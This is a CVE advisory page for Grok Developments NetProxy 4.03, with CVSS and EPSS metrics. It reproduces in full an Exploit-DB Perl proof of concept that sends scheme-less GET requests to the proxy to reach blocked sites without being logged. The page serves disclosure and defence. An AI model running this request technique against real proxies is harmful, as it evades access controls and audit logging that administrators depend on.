Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The connection log file implementation in Grok Developments NetProxy 4.03 does not record requests that omit http:// in a URL, which might allow remote attackers to conduct unauthorized activities and avoid detection.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 3381
Publication date : 2007-02-26 23h00 +00:00
Author : Craig Heffner
EDB Verified : Yes
#!/usr/bin/perl
###########################################################################
#
# Application:
#
# NetProxy 4.03
# http://www.grok.co.uk/netproxy/index.html
#
# Description:
#
# NetProxy includes a powerful web cache to boost
# performance and reduce online costs. There is
# also an application-level firewall to protect your
# network from unwanted access, full access logging
# to allow you to track Internet usage, and
# password-protected access to various Internet resources.
#
# Vulnerability:
#
# Sending a specially crafted request to the proxy server
# allows users to view restricted Web content and bypass
# the logging feature.
#
# Exploit:
#
# Assume that access to http://www.milw0rm.com has been blocked.
# The standard query string sent to NetProxy looks like:
#
# GET http://www.milw0rm.com HTTP/1.0
#
# NetProxy recognizes that this is a blocked URL and subsequently
# blocks the request. However, sending a request without 'http://'
# in the URL allows access to the blocked URL (note that the port
# must be manually specified as well):
#
# GET www.milw0rm.com:80 HTTP/1.0
#
# In addition, requests made in this manner are not logged to
# NetProxy's connection log file.
#
# Work-Around/Fix:
#
# Since the application automatically prepends the 'http://' string
# to every URL specified in the block list, this technique should work
# for all restricted Web sites, and ensures that there is no easy fix
# for this security hole. POC code follows.
#
# Credit:
#
# Exploit discovered and coded by Craig Heffner
# http://www.craigheffner.com
# heffnercj [at] gmail.com
###########################################################################
use IO::Socket;
#Define the NetProxy server and port
$proxy_ip = "127.0.0.1";
$proxy_port = "8080";
#Set the site, port and page to request
$site = "www.milw0rm.com";
$port = "80";
$page = "index.html";
#Define FF and IE user agent strings
$ms_ie = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
$ms_ff = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
#Create connection to NetProxy
my $sock = new IO::Socket::INET(
Proto => 'tcp',
PeerAddr => $proxy_ip,
PeerPort => $proxy_port,
);
die "Failed to connect to [$proxy_ip:$proxy_port] : $!\n" unless $sock;
#Format the request
$request = "GET $site:$port/$page HTTP/1.0\r\n";
$request .= "User-Agent: $ms_ff\r\n";
$request .= "\r\n";
#Send the request
print $sock $request;
#Read the reply
while(<$sock>){
$reply .= $_;
}
close($sock);
#Separate NetProxy header from HTML
($header,$html) = split("\r\n\r",$reply);
print $html;
exit;
# milw0rm.com [2007-02-27]
Products Mentioned
Configuraton 0
Grok_developments>>Netproxy >> Version 4.03
